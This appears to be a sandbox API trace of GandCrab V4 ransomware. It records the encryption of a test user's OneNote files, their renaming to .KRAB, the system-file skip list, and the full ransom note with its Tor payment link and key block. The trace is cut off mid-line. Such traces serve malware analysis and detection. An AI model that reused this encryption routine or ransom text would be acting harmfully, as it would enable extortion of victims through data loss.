lpString2="thumbs.db") returned -1 [0091.478] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0091.478] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0091.478] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.478] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0091.478] lstrcmpW (lpString1="Open Notebook.onetoc2", lpString2=".") returned 1 [0091.478] lstrcmpW (lpString1="Open Notebook.onetoc2", lpString2="..") returned 1 [0091.479] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\", lpString2="Open Notebook.onetoc2" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Open Notebook.onetoc2") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Open Notebook.onetoc2" [0091.479] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.479] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Open Notebook.onetoc2.KRAB") returned 88 [0091.479] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Open Notebook.onetoc2") returned 83 [0091.479] lstrlenW (lpString=".onetoc2") returned 8 [0091.479] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.480] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".onetoc2 ") returned 9 [0091.480] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.480] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Open Notebook.onetoc2") returned 83 [0091.480] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Open Notebook.onetoc2") returned 83 [0091.480] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="desktop.ini") returned 1 [0091.480] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="autorun.inf") returned 1 [0091.480] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="ntuser.dat") returned 1 [0091.480] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="iconcache.db") returned 1 [0091.480] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="bootsect.bak") returned 1 [0091.480] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="boot.ini") returned 1 [0091.480] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="ntuser.dat.log") returned 1 [0091.480] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="thumbs.db") returned -1 [0091.480] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="KRAB-DECRYPT.html") returned 1 [0091.481] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="KRAB-DECRYPT.txt") returned 1 [0091.481] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="CRAB-DECRYPT.txt") returned 1 [0091.481] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="ntldr") returned 1 [0091.481] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="NTDETECT.COM") returned 1 [0091.481] lstrcmpiW (lpString1="Open Notebook.onetoc2", lpString2="Bootfont.bin") returned 1 [0091.481] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.481] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1010df8) returned 1 [0091.482] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0091.482] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0091.482] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0091.482] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0091.483] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0091.483] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.483] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x10113d0) returned 1 [0091.483] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0091.484] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0091.484] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0091.484] CryptGenRandom (in: hProv=0x10113d0, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0091.484] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0091.484] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.485] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x10112c0) returned 1 [0091.485] CryptImportKey (in: hProv=0x10112c0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd560) returned 1 [0091.485] CryptGetKeyParam (in: hKey=0xfbd560, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0091.485] CryptEncrypt (in: hKey=0xfbd560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0091.486] GetLastError () returned 0x0 [0091.486] CryptDestroyKey (hKey=0xfbd560) returned 1 [0091.486] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0091.486] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x10111b0) returned 1 [0091.486] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd560) returned 1 [0091.486] CryptGetKeyParam (in: hKey=0xfbd560, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0091.486] CryptEncrypt (in: hKey=0xfbd560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0091.487] GetLastError () returned 0x0 [0091.487] CryptDestroyKey (hKey=0xfbd560) returned 1 [0091.487] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0091.487] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Open Notebook.onetoc2" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\onenote notebooks\\my notebook\\open notebook.onetoc2"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x734 [0091.488] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0091.488] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0091.488] ReadFile (in: hFile=0x734, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0x1828, lpOverlapped=0x0) returned 1 [0091.519] SetFilePointerEx (in: hFile=0x734, liDistanceToMove=0xffffe7d8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.519] WriteFile (in: hFile=0x734, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1828, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0x1828, lpOverlapped=0x0) returned 1 [0091.519] WriteFile (in: hFile=0x734, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0091.519] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.528] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.528] CloseHandle (hObject=0x734) returned 1 [0091.528] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.528] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Open Notebook.onetoc2" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\onenote notebooks\\my notebook\\open notebook.onetoc2"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Open Notebook.onetoc2.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\onenote notebooks\\my notebook\\open notebook.onetoc2.krab")) returned 1 [0091.529] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.529] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0091.529] lstrcmpW (lpString1="Quick Notes.one", lpString2=".") returned 1 [0091.530] lstrcmpW (lpString1="Quick Notes.one", lpString2="..") returned 1 [0091.530] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\", lpString2="Quick Notes.one" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Quick Notes.one") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Quick Notes.one" [0091.530] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.530] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Quick Notes.one.KRAB") returned 82 [0091.530] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Quick Notes.one") returned 77 [0091.530] lstrlenW (lpString=".one") returned 4 [0091.530] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.530] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".one ") returned 5 [0091.530] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.531] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Quick Notes.one") returned 77 [0091.531] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Quick Notes.one") returned 77 [0091.531] lstrcmpiW (lpString1="Quick Notes.one", lpString2="desktop.ini") returned 1 [0091.531] lstrcmpiW (lpString1="Quick Notes.one", lpString2="autorun.inf") returned 1 [0091.531] lstrcmpiW (lpString1="Quick Notes.one", lpString2="ntuser.dat") returned 1 [0091.531] lstrcmpiW (lpString1="Quick Notes.one", lpString2="iconcache.db") returned 1 [0091.531] lstrcmpiW (lpString1="Quick Notes.one", lpString2="bootsect.bak") returned 1 [0091.531] lstrcmpiW (lpString1="Quick Notes.one", lpString2="boot.ini") returned 1 [0091.531] lstrcmpiW (lpString1="Quick Notes.one", lpString2="ntuser.dat.log") returned 1 [0091.531] lstrcmpiW (lpString1="Quick Notes.one", lpString2="thumbs.db") returned -1 [0091.531] lstrcmpiW (lpString1="Quick Notes.one", lpString2="KRAB-DECRYPT.html") returned 1 [0091.531] lstrcmpiW (lpString1="Quick Notes.one", lpString2="KRAB-DECRYPT.txt") returned 1 [0091.531] lstrcmpiW (lpString1="Quick Notes.one", lpString2="CRAB-DECRYPT.txt") returned 1 [0091.531] lstrcmpiW (lpString1="Quick Notes.one", lpString2="ntldr") returned 1 [0091.531] lstrcmpiW (lpString1="Quick Notes.one", lpString2="NTDETECT.COM") returned 1 [0091.531] lstrcmpiW (lpString1="Quick Notes.one", lpString2="Bootfont.bin") returned 1 [0091.531] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0091.532] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x10114e0) returned 1 [0091.532] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0091.533] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0091.533] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0091.533] CryptGenRandom (in: hProv=0x10114e0, dwLen=0x20, pbBuffer=0x338eccc | out: pbBuffer=0x338eccc) returned 1 [0091.533] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0091.533] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.533] CryptAcquireContextW (in: phProv=0x338ec34, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec34*=0x1011898) returned 1 [0091.534] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0091.534] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0091.535] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0091.535] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338ecec | out: pbBuffer=0x338ecec) returned 1 [0091.535] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0091.535] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.535] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x10113d0) returned 1 [0091.535] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd560) returned 1 [0091.536] CryptGetKeyParam (in: hKey=0xfbd560, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0091.536] CryptEncrypt (in: hKey=0xfbd560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0091.536] GetLastError () returned 0x0 [0091.536] CryptDestroyKey (hKey=0xfbd560) returned 1 [0091.536] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0091.536] CryptAcquireContextW (in: phProv=0x338ec2c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338ec2c*=0x10114e0) returned 1 [0091.536] CryptImportKey (in: hProv=0x10114e0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338ec30 | out: phKey=0x338ec30*=0xfbd560) returned 1 [0091.537] CryptGetKeyParam (in: hKey=0xfbd560, dwParam=0x8, pbData=0x338ec24, pdwDataLen=0x338ec28, dwFlags=0x0 | out: pbData=0x338ec24*=0x800, pdwDataLen=0x338ec28*=0x4) returned 1 [0091.537] CryptEncrypt (in: hKey=0xfbd560, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338ec5c*=0x100) returned 1 [0091.537] GetLastError () returned 0x0 [0091.537] CryptDestroyKey (hKey=0xfbd560) returned 1 [0091.537] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0091.537] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Quick Notes.one" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\onenote notebooks\\my notebook\\quick notes.one"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x734 [0091.538] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0091.538] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0091.539] ReadFile (in: hFile=0x734, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ecfc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ecfc*=0x57ec8, lpOverlapped=0x0) returned 1 [0091.698] SetFilePointerEx (in: hFile=0x734, liDistanceToMove=0xfffa8138, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.698] WriteFile (in: hFile=0x734, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x57ec8, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ecf8*=0x57ec8, lpOverlapped=0x0) returned 1 [0091.699] WriteFile (in: hFile=0x734, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ecf8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ecf8*=0x208, lpOverlapped=0x0) returned 1 [0091.699] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.704] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.705] CloseHandle (hObject=0x734) returned 1 [0091.705] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.706] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Quick Notes.one" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\onenote notebooks\\my notebook\\quick notes.one"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\OneNote Notebooks\\My Notebook\\Quick Notes.one.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\onenote notebooks\\my notebook\\quick notes.one.krab")) returned 1 [0091.707] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.707] FindNextFileW (in: hFindFile=0xfbd3e0, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0 [0091.707] FindClose (in: hFindFile=0xfbd3e0 | out: hFindFile=0xfbd3e0) returned 1 [0091.707] CloseHandle (hObject=0x3a8) returned 1 [0091.708] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0 [0091.708] FindClose (in: hFindFile=0xfbd920 | out: hFindFile=0xfbd920) returned 1 [0091.708] CloseHandle (hObject=0x434) returned 1 [0091.708] FindNextFileW (in: hFindFile=0x1023cb8, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0091.708] lstrcmpW (lpString1="Outlook Files", lpString2=".") returned 1 [0091.708] lstrcmpW (lpString1="Outlook Files", lpString2="..") returned 1 [0091.708] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="Outlook Files" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files" [0091.708] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\" [0091.708] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0091.708] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0091.708] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0091.708] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0091.708] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0091.708] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.713] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0091.713] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\\\KRAB-DECRYPT.txt") returned 63 [0091.713] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Outlook Files\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\outlook files\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0091.714] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC 